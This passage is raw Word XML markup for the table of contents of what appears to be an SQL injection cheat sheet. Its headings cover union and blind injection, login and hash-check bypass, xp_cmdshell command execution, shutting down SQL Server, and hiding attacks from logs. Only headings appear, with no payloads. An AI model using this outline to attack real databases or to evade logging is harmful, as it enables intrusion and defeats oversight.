            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using integers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C78768A"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27" w:anchor="StringOperations" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>String operations</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44687B8D"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28" w:anchor="StringConcat" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>String concatenation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7758ADE1"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29" w:anchor="StringwithoutQuotes" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Strings without quotes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="201392E4" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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30" w:anchor="StringFromHex" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>String from a hex representation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29F6FBF0" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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31" w:anchor="StringFunctions" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using string functions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="032BE821" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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32" w:anchor="HexbasedSamples" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Hex-based SQL injection example</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4674E778"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33" w:anchor="StringUtilities" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>String utility functions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DE0CA41"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34" w:anchor="UnionInjections" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Union injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03BBDA10"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35" w:anchor="UnionLanguageIssues" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dealing with language issues in UNION injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58A93F00"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36" w:anchor="ByPassingLoginScreens" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Bypassing login screens</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FE2BCC3"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37" w:anchor="BypassingLoginHashedPasswords" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Bypassing login screens that use hashed passwords</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="687075E8" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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38" w:anchor="BypassMD5HashCheckSample" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Example of bypassing an MD5 hash check</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D6822DE"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39" w:anchor="DiscoverColumnsErrorBased" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Error-based ways to discover column information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F0E7377"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40" w:anchor="FindColumnsHavingGroupbyErrorBased" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Finding column names using HAVING and GROUP BY (error-based)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48708DBF"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41" w:anchor="FindNumberColumnsInSelectOrderby" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Finding the number of columns in a SELECT query using ORDER BY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20FAB959"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42" w:anchor="ErrorBasedUnionInjectionTips" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tips and tricks for error-based UNION injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DA54075"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43" w:anchor="FindColumnType" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Ways of finding the column type</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57A69A06"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44" w:anchor="InsertPayloadSample" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Simple INSERT payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D6FC9FF"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45" w:anchor="DatabaseVersionDiscovery" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Database version discovery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34A5121B"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46" w:anchor="BulkInsertFromFile" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Bulk insert from a file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BB460D0"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47" w:anchor="SQLServerUtilities" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Server utilities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11F2DE96"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48" w:anchor="BCPBulkCopyProgram" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The bcp (Bulk Copy Program) utility</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D51DDDC"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49" w:anchor="VBSAndWSHScripting" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using VBS and WSH scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38B911B2"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50" w:anchor="SQLServerStoredProcedures" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Server stored procedures</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EE8AC29"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51" w:anchor="XpCmdshellExecuteSystemCommands" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Executing system commands using xp_cmdshell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F217A36"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52" w:anchor="Enablecmdshell" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Enabling xp_cmdshell in SQL Server 2005</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="325A30E0"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53" w:anchor="SQLServerRegistryOperations" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Performing registry operations in SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4911D140"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54" w:anchor="SQLServerUsefulStoredProcedures" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other useful stored procedures for SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B954FDA"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55" w:anchor="SQLServerUsefulSystemViews" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Useful system views in SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A25429A"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56" w:anchor="MSSQLExploitationTips" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Handy techniques for further MSSQL exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4278D0B5"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57" w:anchor="SQLInjectionLimitOrder" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL injection into LIMIT or ORDER</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FEB8386"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58" w:anchor="SQLServerShutdown" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shut down SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7921885D"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59" w:anchor="FindingManipulatingDatabaseStructure" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Finding and manipulating the database structure in SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16794C14"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60" w:anchor="GetUserDefinedTables" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting user-defined tables</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46684B25"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61" w:anchor="GetColumnNames" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting column names</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A17A6E8"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62" w:anchor="MovingRecords" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Moving records</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="686ACB4D"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63" w:anchor="FastWayToExtractDataErrorBased" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Error-based SQL injections in SQL Server: A fast way to extract data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64062B94"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64" w:anchor="FindingDatabaseStructureMySQL" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Finding the database structure in MySQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BC2A81A"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65" w:anchor="GetUserTablesMySQL" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting user-defined tables</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55B7D765"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66" w:anchor="GetColumnNamesMySQL" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting column names</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08CF1164"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67" w:anchor="BlindSQLInjections" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Blind SQL injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ADAD8B0"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68" w:anchor="AutomatableBlindSQLInjectionSample" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Real-life example of an automatable blind SQL injection attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08B783A0"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69" w:anchor="HowToWaitSleepBlindSQLInjection" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Ways of making databases wait or sleep for blind SQL injection attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="034140A2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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70" w:anchor="WaitforDelay" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WAITFOR DELAY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79594078" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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71" w:anchor="BenchmarkFunction" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BENCHMARK()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="700B2F95" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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72" w:anchor="PgsleepFunction" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>pg_sleep()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="782D5EF0" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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73" w:anchor="SleepFunction" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>sleep()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FA0081B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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74" w:anchor="DbmsPipeReceiveMessageFunction" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dbms_pipe.receive_message()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3963FBCE"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75" w:anchor="HidingSQLInjectionAttacksInLogs" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>How SQL injection attacks can be hidden from logs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BBFDB63"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76" w:anchor="SpPasswordLogBypassSQLServer" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
